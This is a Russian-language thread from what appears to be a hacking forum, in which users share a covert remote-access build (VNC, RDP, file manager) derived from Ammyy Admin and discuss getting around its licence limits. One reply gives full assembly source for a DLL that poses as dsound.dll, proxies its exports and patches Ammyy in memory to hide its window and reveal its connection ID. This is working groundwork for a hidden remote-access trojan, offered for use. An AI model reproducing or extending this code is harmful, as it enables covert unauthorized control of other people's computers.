• XSS.stack #1 – первый литературный журнал от юзеров форума

Скрытая сборка аля тимвиера

greenzy

(L3) cache
Пользователь
Регистрация
25.10.2010
Сообщения
208
Реакции
1
Дабы не соблазнялись всякими платными сборками, вот вам сборка. vnc,rdp,filemanager все включено. на основе ammy admin.

Как это запустить?
По идее все просто, надо подгрузить длл в комплекте.

Как приконектится?
Скачиваем с офф сайта админ клиент, вбиваем ип и все

Какой пароль?

I am Jack's... complete lack of surprise.

http://www.sendspace.com/file/65jozo
 

Вложения

  • es.rar
    322.2 КБ · Просмотры: 61
greenzy
Спасибо!

кста, помним про ограничение бесплатной версии: не более 15 часов в месяц.

можно, по идее, сделать свою админку на основании этого и цепляться не только по ip, но и по id за натом:
http://www.mirrorcreator.com/files/14BGHSR...r.unix.7z_links
 
Ничего конкретного сказать не могу,но вроде бы при старых версиях ammy у кого то удавалось снять ограничение.Или это фантастика?Потому как наверняка проверяется на сервере,а это нужно менять отправляемую на сервер информацию.Или банально поправить переходы в коде.
 
ограничения со стороны оператора вроде как легко обходятся использованием виртуалки.

ограничения со стороны клиента без смены роутера никак не обходятся т.к. время считается на серваке ammyy. [хотя можно найти алгоритм генерации id компа и найти способ менять/сбрасывать этот id]

ps это я про 3-ю версию
 
можно, по идее, сделать свою админку на основании этого и цепляться не только по ip, но и по id за натом:
http://www.mirrorcreator.com/files/14BGHSR...r.unix.7z_links
хмм..заработала только со второй версией, у тебя так же?

2grenzy
Врем отсчитывается на серверах аммии, а не локально.
 
хмм..заработала только со второй версией, у тебя так же?
по ходу да :( там в 3-й что-то в протоколе изменилось. брал здесь:
http://forum.ru-board.com/misc.cgi?action=...=35&topic=44757

там, оказывается этой проблемой уже интересовались.
Автор: BluR666, Отправлено:12:50 10-11-2011
Я имел ввиду как раз твою реализацию rl.ammyy.com . Она расшифровывает приходящий трафик от 3-й версии и правильно шифрует ответ . Но видимо в ответе добавлена новая информация , без которой 3 версия не работает . А роутеры у меня на фришной версии вообще не работают . Так что нужна реализация rl.ammyy.com с активацией 3 версии .

Если есть желающие помочь . Пишите в аську 999464 .
 
Тема с дллкой аля аммии(и чем вам так не по душе тимвиевер) уже была на
данном ресурсе:
хttps://xakepy.cc/showthread.php?t=76229&page=5
Можете посмеяться.Дллка только была тестовая и делала всего то,что убирала гуи
у амми и выводила айди в мессаге.Можно было бы пойти дальше,но как то все
на этом и закончилось.

Код:
format PE GUI 4.0 DLL
entry DllEntryPoint
                     
  include 'include\win32a.inc'
                     
   macro HookApi [api]
{ 
common 
        local   JumpComm
        JumpComm: 
               call    GetProcAddr
            .if  eax <> 0
                jmp     eax
            .endif
                ret
forward 
        local name 
        ip#api: 
                push    name 
                jmp     JumpComm 
common 
        section '.edat' export readable executable
        
        local module,addresses,names,ordinal,count 
        count = 0 
forward 
        count = count+1 
common 
        dd 0,0,0,RVA module,1 
        dd count,count,RVA addresses,RVA names,RVA ordinal 
        addresses: 
forward 
        dd RVA ip#api 
common 
        names: 
forward 
        dd RVA name 
common 
        ordinal: 
        count = 0 
forward 
        dw count 
        count = count+1 
common 
        module db HOOK_DLL_NAME,0 
forward 
        name db `api,0 
common 
        local x,y,z,str1,str2,v1,v2 
        x = count shr 1 
        while x > 0 
                y = x 
                while y < count 
                        z = y 
                        while z-x >= 0 
                                load v1 dword from names+z*4 
                                str1=($-RVA $)+v1 
                                load v2 dword from names+(z-x)*4 
                                str2=($-RVA $)+v2 
                                while v1 > 0 
                                        load v1 from str1+%-1 
                                        load v2 from str2+%-1 
                                        if v1 <> v2 
                                                break 
                                        end if 
                                end while 
                                if v1<v2 
                                        load v1 dword from names+z*4 
                                        load v2 dword from names+(z-x)*4 
                                        store dword v1 at names+(z-x)*4 
                                        store dword v2 at names+z*4 
                                        load v1 word from ordinal+z*2 
                                        load v2 word from ordinal+(z-x)*2 
                                        store word v1 at ordinal+(z-x)*2 
                                        store word v2 at ordinal+z*2 
                                else 
                                        break 
                                end if 
                                z = z-x 
                        end while 
                        y = y+1 
                end while 
                x = x shr 1 
        end while


}
          HOOK_DLL_NAME equ    'dsound.dll'
                     
                     
                     
section '.code' code readable executable
                     
                     
                     
;--------------------------------------------------------------------------------;
; [DllEntryPoint]
;--------------------------------------------------------------------------------;

  proc DllEntryPoint hinstDLL,fdwReason,lpvReserved
    .if        [fdwReason] = DLL_PROCESS_ATTACH
          invoke     GetSystemDirectory,szSysDllPath,256
          mov        edx,szSysDllPath
          mov        byte[edx+eax],'\'
          cinvoke    strcat,szSysDllPath,HOOK_DLL_NAME
          invoke     LoadLibrary,addr szSysDllPath
          mov        [hHookMod],eax
          invoke     RtlAddVectoredExceptionHandler,1,VectoredExceptionHandler
          stdcall    ModCode,0x4068D2,0cch,1
          stdcall    ModCode,0x41FACB,0cch,1
    .elseif    [fdwReason] = DLL_PROCESS_DETACH
          invoke     FreeLibrary,[hHookMod]
    .endif     
          mov        eax,TRUE
          ret        
  endp    
                     
                     
                     
;--------------------------------------------------------------------------------;
; [GetProcAddr]
;--------------------------------------------------------------------------------; 
                     
  proc GetProcAddr,szProcName
          invoke     GetProcAddress,[hHookMod],[szProcName]
          ret        
  endp
                     
                     
;--------------------------------------------------------------------------------;
; [ModCode]
;--------------------------------------------------------------------------------;

  proc ModCode uses ebx,dwaddr,byte,szbyte
    locals 
          OldProtect           dd ?
    endl 
                     
          lea        ebx,[OldProtect]
          stdcall    _ZwProtectVirtualMemory,-1,[dwaddr],[szbyte],PAGE_EXECUTE_READWRITE,ebx
          cinvoke    memset,[dwaddr],[byte],[szbyte]
          stdcall    _ZwProtectVirtualMemory,-1,[dwaddr],[szbyte],[OldProtect],ebx
          ret        
  endp    
                     
                     
                     
                     
                     
                     
;--------------------------------------------------------------------------------;
; [_ZwProtectVirtualMemory]
;--------------------------------------------------------------------------------;

  proc _ZwProtectVirtualMemory ProcessHandle,BaseAddress,BytesToProtect,NewProtection,OldProtection
          invoke     ZwProtectVirtualMemory,[ProcessHandle],addr BaseAddress,addr BytesToProtect,[NewProtection],[OldProtection]
          ret        
  endp    
                     
                     
                     
;--------------------------------------------------------------------------------;
; [VectoredExceptionHandler]
;--------------------------------------------------------------------------------;

  proc VectoredExceptionHandler uses ebx,ExceptionPointers
          mov        ebx,[ExceptionPointers]
          assign     ebx,EXCEPTION_POINTERS
          mov        edx,[.ebx.pExceptionRecord]
          assign     edx,EXCEPTION_RECORD
          mov        ecx,[.ebx.ContextRecord]
          assign     ecx,CONTEXT
          cmp        [.edx.ExceptionCode],EXCEPTION_BREAKPOINT
          jne        .next
          mov        eax,0x4068D2
          cmp        [.edx.ExceptionAddress],eax
          jne        @f
          mov        esi,[.ecx.regEsi]
          mov        byte[esi+0ah],1
          stdcall    ModCode,0x4068D2,08Bh,1
          jmp        .contine
  @@:        
          mov        eax,0x41FACB
          cmp        [.edx.ExceptionAddress],eax
          jne        .next
          mov        edx,[.ecx.regEcx]
          mov        edx,[edx]
          invoke     MessageBox,0,edx,0,0
          stdcall    ModCode,0x41FACB,0c6h,1
                     
    .contine:  
          mov        eax,EXCEPTION_CONTINUE_EXECUTION
          ret        
    .next:     
          mov        eax,EXCEPTION_CONTINUE_SEARCH
          ret        
  endp    
          


           
                     
section '.data' data readable writeable
                     
          szSysDllPath         db 256 dup (?)
          hHookMod             dd ?


                     
section '.idat' import readable executable
                     
  library kernel32,'KERNEL32.DLL',\
          user32,'USER32.DLL',\ 
          ntdll,'NTDLL.DLL' 
                     
  import  kernel32,\
          GetSystemDirectory,'GetSystemDirectoryA',\ 
          LoadLibrary,'LoadLibraryA',\ 
          FreeLibrary,'FreeLibrary',\ 
          GetProcAddress,'GetProcAddress' 
                     
  import  user32,\
          MessageBox,'MessageBoxA' 
                     
  import  ntdll,\
          ZwProtectVirtualMemory,'ZwProtectVirtualMemory',\ 
          RtlAddVectoredExceptionHandler,'RtlAddVectoredExceptionHandler',\ 
          memset,'memset',\ 
          strcat,'strcat'



HookApi    DirectSoundCreate,\
          DirectSoundEnumerateA,\ 
          DirectSoundEnumerateW,\ 
          DllCanUnloadNow,\ 
          DllGetClassObject,\ 
          DirectSoundCaptureCreate,\ 
          DirectSoundCaptureEnumerateA,\ 
          DirectSoundCaptureEnumerateW,\ 
          GetDeviceID,\ 
          DirectSoundFullDuplexCreate,\ 
          DirectSoundCreate8,\ 
          DirectSoundCaptureCreate8


                     
section '.reloc' fixups data discardable

Ничего собственно интересного.Это я так к слову.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх